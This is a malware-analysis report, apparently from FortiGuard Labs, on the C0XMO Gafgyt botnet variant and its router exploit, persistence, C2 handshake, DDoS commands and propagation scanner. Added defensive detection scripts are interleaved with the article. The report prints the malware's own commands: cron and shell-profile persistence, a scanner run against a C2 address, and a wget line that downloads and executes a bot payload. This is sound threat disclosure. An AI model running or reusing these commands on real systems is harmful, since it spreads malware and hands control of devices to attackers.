Inside the Cross-Platform Propagation of a New Gafgyt Variant C0XMO
Published: 2026-6-3 13:00:00 | Source: feeds.fortinet.com

Affected Platforms: DD-WRT changeset before 45723
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High

This past March, FortiGuard Labs discovered a new Gafgyt botnet variant, C0XMO, that spreads by exploiting CVE-2021-27137. Our analysis revealed that, unlike earlier versions, this malware separates its lateral movement into a standalone Python script. This approach helps the attacker target various system architectures and device types more efficiently. Below is a detailed technical overview of its structure, propagation methods, and attack features.

The threat actor delivered the malware by exploiting CVE-2021-27137, a stack buffer overflow in the UPnP service of vulnerable DD-WRT router firmware versions. The vulnerability occurs when the SSDP parser mishandles oversized ST:uuid: values in specially crafted M-SEARCH requests sent via UDP port 1900.

Figure 1: The exploitation of the CVE-2021-27137 vulnerability
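The trigger condition described above (an M-SEARCH request whose ST header carries an oversized uuid: value) is simple enough to check at the network edge. The following is an added example, not code from the original report: a small SSDP parser that flags M-SEARCH datagrams with an unusually long ST value. The 64-character cutoff is an assumption chosen for this example (a legitimate uuid: value is "uuid:" plus 36 characters); the sample datagrams are constructed here for illustration and are not exploit payloads.

```python
from typing import Dict, Optional, Tuple

# Assumption for this example: a legitimate "uuid:" ST value is 41 characters
# ("uuid:" + a 36-character UUID); anything well past that is the oversized
# pattern the advisory describes. 64 is a cutoff chosen here, not a value
# from the advisory.
MAX_ST_LEN = 64


def parse_ssdp(datagram: bytes) -> Tuple[str, Dict[str, str]]:
    """Split an SSDP datagram (HTTP-over-UDP framing) into its request line
    and a dict of upper-cased header names to stripped values."""
    text = datagram.decode("latin-1")          # never raises on arbitrary bytes
    lines = text.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if line == "":                          # blank line ends the header block
            break
        if ":" in line:
            name, value = line.split(":", 1)    # "ST: uuid:..." -> ("ST", "uuid:...")
            headers[name.strip().upper()] = value.strip()
    return lines[0], headers


def check_msearch(datagram: bytes) -> Tuple[bool, Optional[str], bool]:
    """Return (is_msearch, st_value, oversized_uuid) for one UDP/1900 datagram.
    oversized_uuid is True only for M-SEARCH requests whose ST starts with
    'uuid:' and exceeds MAX_ST_LEN characters."""
    request_line, headers = parse_ssdp(datagram)
    if not request_line.upper().startswith("M-SEARCH"):
        return False, None, False
    st = headers.get("ST", "")
    oversized = st.lower().startswith("uuid:") and len(st) > MAX_ST_LEN
    return True, st, oversized


# Constructed sample datagrams (not captured traffic).
SAMPLE_BENIGN = (
    b"M-SEARCH * HTTP/1.1\r\n"
    b"HOST: 239.255.255.250:1900\r\n"
    b"MAN: \"ssdp:discover\"\r\n"
    b"MX: 2\r\n"
    b"ST: uuid:12345678-1234-1234-1234-123456789abc\r\n"
    b"\r\n"
)
SAMPLE_OVERSIZED = (
    b"M-SEARCH * HTTP/1.1\r\n"
    b"HOST: 239.255.255.250:1900\r\n"
    b"MAN: \"ssdp:discover\"\r\n"
    b"MX: 2\r\n"
    b"ST: uuid:" + b"A" * 200 + b"\r\n"       # filler only; illustrates length, not an exploit
    b"\r\n"
)
SAMPLE_NOTIFY = (
    b"NOTIFY * HTTP/1.1\r\n"
    b"HOST: 239.255.255.250:1900\r\n"
    b"NT: upnp:rootdevice\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for label, dg in (("benign", SAMPLE_BENIGN),
                      ("oversized", SAMPLE_OVERSIZED),
                      ("notify", SAMPLE_NOTIFY)):
        is_msearch, st, flagged = check_msearch(dg)
        print(f"{label:>9}: m-search={is_msearch} st_len={len(st or '')} flagged={flagged}")
```

Fed from a packet capture or a UDP socket bound to port 1900, the same function gives a per-datagram verdict; unpatched DD-WRT builds that should still be blocked at the perimeter are the firmware versions before changeset 45723 named in the header of this report.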

Although the attacker targeted a Japanese technology firm, the source IP address was traced to Germany. The compromised host downloaded the malware to /tmp/.cache. Our analysis revealed multiple malware samples compiled for various Linux architectures, such as ARM, MC68000, MIPS R3000, PowerPC, SuperH, Intel 80386, and AMD64.

Malware Analysis

C0XMO exhibits many traits typical of Gafgyt variants, including weak-credential brute-force attacks targeting Telnet and SSH, embedded command-injection vulnerabilities, and various DDoS attack techniques. This analysis is based on the bot.x86_64 sample.

Botnet

As soon as C0XMO is delivered and executed on the victim host, it establishes itself in four stages: persistence setup, self-copying, auto-start configuration, and termination of competing processes.

Persistence

The malware first checks its execution path through /proc/self/exe for persistence-related operations.

Figure 2: Checking C0XMO execution path through /proc/self/exe

It then generates multiple hidden file paths, including /tmp/.sys, /var/tmp/.sys, and /dev/shm/.sys.

Figure 3: Generating multiple hidden file paths

C0XMO copies itself to these hidden locations and sets the file permissions to 755, enabling execution. If there is a home directory, the malware also copies itself to $HOME/.sys.

Figure 4: Copying C0XMO to hidden locations and assigning file permission

The malware then creates cron jobs to run C0XMO every 15 minutes.

(crontab -l 2>/dev/null | grep -v '%s'; echo '*/15 * * * * %s >/dev/null 2>&1') | crontab -

Figure 5: Creating cron jobs to execute C0XMO every 15 minutes

Meanwhile, C0XMO appends execution commands to multiple shell profile files such as ~/.profile, ~/.bashrc, and ~/.bash_profile, using the hidden files created earlier.

grep -q '/tmp/.sys' ~/.bashrc 2>/dev/null || echo '/tmp/.sys &' >> ~/.bashrc 2>/dev/null

Figure 6: Appending execution commands to shell profile files

C0XMO can also re-execute itself if the malware process is terminated for any reason.

Figure 7: C0XMO re-executing itself when the process is terminated
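The three persistence artifacts described in this section (hidden .sys copies, a 15-minute cron entry, and a backgrounded launch line appended to shell profiles) can be audited from the host itself. The following is an added example written for this article, not code from the original report: read-only checks that look for exactly those artifacts, run against constructed sample crontab and .bashrc content. The helper names are this example's own; the paths and command shapes come from the analysis above.

```python
import os
import re
import subprocess
from typing import Dict, Iterable, List, Optional, Tuple

# Hidden copy locations named in the analysis; $HOME/.sys is added at runtime.
HIDDEN_COPY_PATHS = ["/tmp/.sys", "/var/tmp/.sys", "/dev/shm/.sys"]
SHELL_PROFILES = ["~/.profile", "~/.bashrc", "~/.bash_profile"]

# A whitespace-delimited token ending in "/.sys", e.g. /tmp/.sys or /root/.sys.
SYS_TOKEN_RE = re.compile(r"(?<!\S)(\S*/\.sys)(?!\S)")
# The line the malware appends to shell profiles: "<hidden path> &".
PROFILE_LINE_RE = re.compile(r"^\s*(\S*/\.sys)\s*&\s*$")


def find_cron_hits(crontab_text: str) -> List[Tuple[str, bool]]:
    """Return (path, every_15_min) for each active cron line that runs a hidden copy."""
    hits = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):        # skip blanks and comments
            continue
        m = SYS_TOKEN_RE.search(line)
        if m:
            hits.append((m.group(1), line.startswith("*/15 ")))
    return hits


def find_profile_hits(profile_text: str) -> List[str]:
    """Return the hidden-copy paths that a shell profile launches in the background."""
    hits = []
    for line in profile_text.splitlines():
        m = PROFILE_LINE_RE.match(line)
        if m:
            hits.append(m.group(1))
    return hits


def find_hidden_copies(existing: Iterable[str], home: Optional[str] = None) -> List[str]:
    """Given the set of paths that exist on a host, return the known hidden-copy
    locations among them, in the order the analysis lists them."""
    wanted = list(HIDDEN_COPY_PATHS)
    if home:
        wanted.append(os.path.join(home, ".sys"))
    present = set(existing)
    return [p for p in wanted if p in present]


def audit_live_host() -> Dict[str, list]:
    """Run all three checks against the current host without modifying anything."""
    home = os.path.expanduser("~")
    candidates = HIDDEN_COPY_PATHS + [os.path.join(home, ".sys")]
    report: Dict[str, list] = {
        "hidden_copies": find_hidden_copies([p for p in candidates if os.path.exists(p)], home),
        "cron": [],
        "profiles": [],
    }
    try:                                             # crontab may be absent on minimal systems
        out = subprocess.run(["crontab", "-l"], capture_output=True, text=True).stdout
        report["cron"] = find_cron_hits(out)
    except OSError:
        pass
    for prof in SHELL_PROFILES:
        path = os.path.expanduser(prof)
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                for hit in find_profile_hits(fh.read()):
                    report["profiles"].append((path, hit))
    return report


# Constructed samples (not taken from an infected host).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/15 * * * * /tmp/.sys >/dev/null 2>&1
"""
SAMPLE_BASHRC = """\
export PATH=$HOME/bin:$PATH
alias ll='ls -la'
/tmp/.sys &
"""

if __name__ == "__main__":
    print("cron hits     :", find_cron_hits(SAMPLE_CRONTAB))
    print("profile hits  :", find_profile_hits(SAMPLE_BASHRC))
    print("live host     :", audit_live_host())
```

Any hit is worth treating as a confirmed-compromise indicator rather than a heuristic: none of these paths or profile lines has a legitimate reason to exist, and the same crontab line shape recurs across Gafgyt-family samples.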

Competitor Killing

After completing the previous stages, C0XMO verifies its PID and executable filename to prevent unintentional self-deletion during later cleanup operations.

Figure 8: Checking the C0XMO execution path to avoid accidental self-deletion

The malware scans all active processes in /proc, comparing their names to an internal blacklist. If a process name matches an entry on the blacklist, C0XMO immediately terminates that process.

Figure 9: Scanning all running processes under /proc

The blacklist primarily targets four categories:

  • Botnet malware
  • Network service applications
  • Programming-related tools
  • Red team utilities

Figure 10: Targeted process name blacklist

The malware then checks the executable paths of processes that have been terminated and compares them with a path blacklist. If it finds a match, C0XMO deletes the corresponding file from the system.

Figure 11: Removing malware through executable paths

Figure 12: Targeted malware path blacklist

C0XMO attempts to eliminate competing botnets run by other threat actors. It not only deletes rival malware binaries but also tries to remove associated persistence mechanisms such as cron jobs, rc.local, init.d services, system services, and shell profile scripts.

Figure 13: Eliminating potentially competing botnets

C2 Connection

After completing the local persistence setup, C0XMO establishes a connection to the C2 server at 85[.]215[.]131[.]70.

Figure 14: Establishing the connection with the C2 server

C0XMO performs a custom handshake after connecting. It begins by sending a specific magic string, 669787761736865726500, together with the shared secret FS2@SA__=A23cAxs3S3@23AF@A3454DFSA0D. The server then responds with the string HANDSHAKE_OK.

Next, C0XMO sends the string BOT to identify itself as a botnet node, after which the server responds with OK.

In the final stage of the handshake, the bot sends the hexadecimal sequence FF FF FF FF 75 as the final magic value to the C2 server. The server then responds with a welcome message confirming that the handshake process has been successfully completed.

Figure 15: Sequence diagram of the C0XMO custom handshake
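Because the handshake is fixed and unencrypted, a reassembled TCP stream can be checked against it stage by stage. The following is an added example, not code from the original report: a small state machine that walks a list of (direction, payload) segments and reports how far the C0XMO exchange progressed. The magic string, shared secret, response strings and final bytes are the values given above; the framing between them (separators, line endings) is not shown in the report, so matching is deliberately done on substrings and stripped payloads, and the sample streams are constructed for illustration.

```python
from typing import Callable, List, Tuple

# Values taken from the analysis.
MAGIC = b"669787761736865726500"
SECRET = b"FS2@SA__=A23cAxs3S3@23AF@A3454DFSA0D"
FINAL_MAGIC = bytes.fromhex("ffffffff75")        # FF FF FF FF 75

# Expected exchange, in order: (direction, predicate on payload, label).
# "c2s" = bot to C2, "s2c" = C2 to bot. The exact framing is an assumption,
# so predicates use substring / stripped-equality matches.
STAGES: List[Tuple[str, Callable[[bytes], bool], str]] = [
    ("c2s", lambda p: MAGIC in p and SECRET in p, "magic+secret"),
    ("s2c", lambda p: p.strip() == b"HANDSHAKE_OK", "HANDSHAKE_OK"),
    ("c2s", lambda p: p.strip() == b"BOT", "BOT"),
    ("s2c", lambda p: p.strip() == b"OK", "OK"),
    ("c2s", lambda p: p.startswith(FINAL_MAGIC), "final-magic"),
    ("s2c", lambda p: len(p.strip()) > 0, "welcome"),   # any non-empty banner
]

Stream = List[Tuple[str, bytes]]


def match_handshake(stream: Stream) -> Tuple[bool, List[str]]:
    """Walk a reassembled stream and return (complete, labels_matched).
    Segments flowing in the direction not currently expected are ignored;
    the first segment in the expected direction that does not fit the next
    stage ends the match."""
    idx, matched = 0, []
    for direction, payload in stream:
        if idx == len(STAGES):
            break
        want_dir, pred, label = STAGES[idx]
        if direction != want_dir:
            continue
        if not pred(payload):
            break
        matched.append(label)
        idx += 1
    return idx == len(STAGES), matched


def is_c0xmo_hello(payload: bytes) -> bool:
    """Single-segment check: the bot's first message carries both constants."""
    return MAGIC in payload and SECRET in payload


# Constructed sample streams (not captured traffic).
SAMPLE_COMPLETE: Stream = [
    ("c2s", MAGIC + b" " + SECRET + b"\n"),
    ("s2c", b"HANDSHAKE_OK\n"),
    ("c2s", b"BOT\n"),
    ("s2c", b"OK\n"),
    ("c2s", FINAL_MAGIC),
    ("s2c", b"Welcome\n"),
]
SAMPLE_REJECTED: Stream = [                      # server did not accept the secret
    ("c2s", MAGIC + b" " + SECRET + b"\n"),
    ("s2c", b"ERR\n"),
]
SAMPLE_HTTP: Stream = [                          # unrelated traffic on the same port
    ("c2s", b"GET / HTTP/1.1\r\nHost: example.invalid\r\n\r\n"),
    ("s2c", b"HTTP/1.1 200 OK\r\n\r\n"),
]

if __name__ == "__main__":
    for name, s in (("complete", SAMPLE_COMPLETE),
                    ("rejected", SAMPLE_REJECTED),
                    ("http", SAMPLE_HTTP)):
        print(f"{name:>9}: {match_handshake(s)}")
```

For inline detection the first stage alone is enough: the two constants in one client-to-server segment make a precise content-match signature, and a full six-stage match over a flow record is what you would use to confirm that a host actually enrolled with the C2 rather than merely probing it.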

Command Handler

C0XMO contains a command handler that parses commands received from the C2 server. The malware primarily supports five commands: ping, stop, scan, stopscan, and attack-related commands.

The ping command is used to verify whether the infected host is still active. If the host is reachable, the bot responds with the PONG string as a heartbeat message.

Figure 16: The ping command for the heartbeat mechanism

C0XMO supports 19 different DDoS attack methods for various scenarios, as shown in the table below.

Command   | Attack Function       | Attack Type
----------|-----------------------|-----------------------------
UDP       | attack_udp_bypass     | UDP Bypass Flood
TCP       | attack_tcp_bypass     | TCP Flood
TUP       | attack_tcp_udp_bypass | Hybrid TCP + UDP Flood
SYN       | attack_syn            | TCP SYN Flood
VSE       | attack_vse            | Valve Source Engine Flood
DISCORD   | attack_discord2       | Discord Voice UDP Flood
FIVEM     | attack_fivem          | FiveM Game Flood
OVHTCP    | attack_ovh_tcp        | OVH Bypass TCP Flood
OVHUDP    | attack_ovh_udp        | OVH Bypass UDP Flood
HEX       | attack_hex            | Hex-pattern Flood
NTP       | attack_ntp            | NTP Amplification
MEM       | attack_memcached      | Memcached Amplification
ICMP      | attack_icmp           | ICMP Flood
POD       | attack_ping_of_death  | Ping of Death
HTTPSTORM | attack_http_storm     | HTTP Request Storm
HTTPIO    | attack_http_io        | Slow/IO Exhaustion
HTTPSPOOF | attack_http_spoof     | HTTP Spoof Flood
HTTPGET   | attack_http_get       | HTTP GET Flood
HTTPCFB   | attack_http_cfb       | Cloudflare Bypass HTTP Flood

Unlike traditional botnets, C0XMO isolates its scanning function into an independent Python script. The malware fetches this script from the same IP address and port—217[.]160[.]125[.]125:15527—that it uses to distribute the main C0XMO binary.

Figure 17: Downloading the scanner script from the IP address that also distributes the C0XMO binary

The malware installs several required packages, including requests, paramiko, and beautifulsoup4.

pip3 install requests paramiko beautifulsoup4 --break-system-packages 2>/dev/null || pip3 install requests paramiko beautifulsoup4 2>/dev/null || python3 -m pip install requests paramiko beautifulsoup4 --break-system-packages 2>/dev/null

These packages are primarily used for network communication, including sending HTTP requests, receiving responses, and performing SSH- and Telnet-based interactions.

C0XMO then executes the scanner script with the following arguments.

python3 /tmp/scanner.py --rand --rand-ports 23,22,80,443,8080,5555,5511,5554,4443,81,8000,7547,8081,8443,8888 --runtime X --server 217[.]160[.]125[.]125:15527

  • --rand: Enables random IP scanning
  • --rand-ports: Specifies the target ports used during random scanning including 23, 22, 80, 443, 8080, 5555, 5511, 5554, 4443, 81, 8000, 7547, 8081, 8443, and 8888
  • --runtime: Specifies the scanner runtime duration in seconds
  • --server: Specifies the C2 server address

Figure 18: Executing the scanner script

Scanner

The scanner has around 22 functions categorized into six groups: Worker, Blacklist, Telnet, SSH, HTTP Exploit, and ADB Exploit. Its main goal is to enable lateral movement.

Class        | Function               | Description
-------------|------------------------|------------------------------------------
Main         | main                   | Main Program
Worker       | worker                 | Main Scanning and Exploitation Worker
Blacklist    | load_blacklist         | Load Blacklist Rules
Blacklist    | expand_wildcard_range  | Expand Wildcard IPs and Ranges
Blacklist    | expand_ip_range        | Expand IP Ranges
Blacklist    | parse_complex_pattern  | Parse Complex Wildcard and Range Patterns
Blacklist    | is_blacklisted         | Check Whether an IP is Blacklisted
Blacklist    | load_failed_ips        | Load Failed IP Addresses
Blacklist    | add_failed_ip          | Add Failed IP Address
Blacklist    | random_ip              | Generate Random Public IP Address
Blacklist    | detect_arch            | Detect CPU Architecture
Telnet       | telnet_login           | Telnet Weak-Credential Login
Telnet       | install_bot_telnet     | Deploy Bot After Successful Telnet Login
SSH          | is_ssh                 | Detect SSH Service
SSH          | ssh_login              | SSH Weak-Credential Login
SSH          | install_bot_ssh        | Deploy Bot After Successful SSH Login
HTTP Exploit | try_cves_fast          | Fast HTTP Exploitation
HTTP Exploit | exploit_password_leak  | Exploit Password Disclosure Vulnerability
HTTP Exploit | exploit_systools_rce   | Exploit Systools Command Injection
HTTP Exploit | exploit_glpi_htmLawed  | Exploit GLPI htmLawed RCE
HTTP Exploit | exploit_glpi_barcode   | Exploit GLPI Barcode Injection
HTTP Exploit | exploit_avtech         | Exploit AVTECH DVR Vulnerability
HTTP Exploit | exploit_nvms9000       | Exploit NVMS-9000 Vulnerability
HTTP Exploit | exploit_broadband      | Exploit Broadband Router Vulnerability
HTTP Exploit | exploit_zyxel_systools | Exploit Zyxel SysTools RCE
HTTP Exploit | try_all_cves           | Execute All HTTP Exploits
ADB Exploit  | adb_exploit            | Exploit Android Debug Bridge (ADB)

The scanner displays its banner upon execution.

Figure 19: Scanner banner displayed upon execution

The scanner initially loads the blacklist and failed IP entries from blacklist.txt and failed.txt. These files help prevent scanning honeypots, research institutions, known bot nodes, and previously unsuccessful or targeted IPs.

The script then creates numerous worker threads. Each thread performs the following steps:

  • Retrieve a target
  • Check the blacklist and failed IP. If the target is included in either list, the scanner skips it.
  • Scan whether the target ports are open
  • Detect the service type
  • Execute Telnet, SSH, HTTP, and ADB exploitation attempts
  • Deploy the C0XMO payload after successful exploitation; otherwise, add the failed target to failed.txt

Figure 20: Worker threads

The scanner performs weak password brute-force attacks on Telnet and SSH services. After successful authentication, it identifies the target host’s architecture and downloads the appropriate payload.

cd /tmp
wget -q http://malicious[.]server/bot.arch -O .cache
chmod 777 .cache
./.cache
rm -f .cache

Figure 21: Hard-coded weak credentials

Figure 22: Deploying C0XMO if successfully accessed

The scanner also includes numerous HTTP-based exploits for initial access, including:

  • UPnP SOAP Injection (CVE-2021-27137)
  • CGI Shell Injection
  • HNAP SOAP Injection (CVE-2015-2051)
  • DVR Command Injection
  • Systools Command Injection
  • GLPI htmLawed RCE (CVE-2022-35914)
  • GLPI Barcode Injection
  • AVTECH DVR Vulnerability (CVE-2025-34054, CVE-2016-15047)
  • NVMS-9000 Vulnerability
  • Broadband Router Vulnerability
  • Zyxel SysTools RCE

Figure 23: HTTP-based exploitation used to achieve initial access

In addition, the scanner exploits unauthorized access vulnerabilities in the Android Debug Bridge (ADB) to compromise exposed Android-based devices.

Figure 24: Android Debug Bridge (ADB) unauthorized access vulnerabilities

Conclusion

C0XMO exhibits a considerably more advanced architecture and feature set compared to earlier IoT botnets. Its modular exploitation features, multi-phase propagation methods, and overall design suggest a greater degree of operational sophistication and complexity than typical Gafgyt malware. The separation of its scanning and propagation components underscores an evolution towards more adaptable and scalable botnet deployment strategies.

Organizations are strongly advised to immediately update all affected network devices and IoT systems to the latest firmware. They should also disable unnecessary remote-access services such as Telnet and UPnP, enforce robust credential policies, and continuously monitor for suspicious outbound scans or exploitation attempts. Additionally, regular auditing of internet-facing services can help minimize the attack surface caused by known vulnerabilities and default settings.

Fortinet Protections

The malware described in this report is detected and blocked by FortiGuard Antivirus as:

ELF/Gafgyt.SORA!tr
ELF/Gafgyt.C0MOX!tr
ELF/Mirai.EGX!tr
Python/Gafgyt.C0MOX!tr

The FortiGuard AntiVirus service engine is integrated into FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running these products with up-to-date signatures are protected against the malware components described in this report.

The FortiGuard Web Filtering Service blocks the C2 server.

FortiGuard Labs provides an IPS signature against attacks exploiting the following vulnerabilities:

CVE-2021-27137: 56117 DD-WRT.UPNP.CVE-2021-27137.uuid.Buffer.Overflow

CVE-2015-2051: 50772 D-Link.Devices.HNAP.SOAPAction-Header.Command.Execution.Vulnerability

CVE-2022-35914: 52227 GLPI-Project.GLPI.htmLawedTest.php.Code.Injection

CVE-2016-15047: 43635 Avtech DVR Camera Authentication bypass and Command Execution Exploit(Core impact)

CVE-2025-34054: 43635 Avtech DVR Camera Authentication bypass and Command Execution Exploit(Core impact)

Organizations seeking to strengthen foundational security awareness may also consider completing Fortinet Certified Fundamentals (FCF) training in Cybersecurity. This module is designed to help end users learn to identify and protect themselves from phishing attacks.

The FortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks infrastructure associated with this campaign by correlating malicious IP intelligence collected from Fortinet’s global sensor network, CERT collaborations, MITRE, trusted industry partners, and other intelligence sources.

If you believe this or any other cybersecurity threat has impacted your organization, contact our Global FortiGuard Incident Response Team for assistance.

IOCs

Hosts

217[.]160[.]125[.]125:15527
176[.]100[.]37[.]91
85[.]215[.]131[.]70

Files
Article source: https://feeds.fortinet.com/~/957685901/0/fortinet/blog/threat-research~Inside-the-CrossPlatform-Propagation-of-a-New-Gafgyt-Variant-CXMO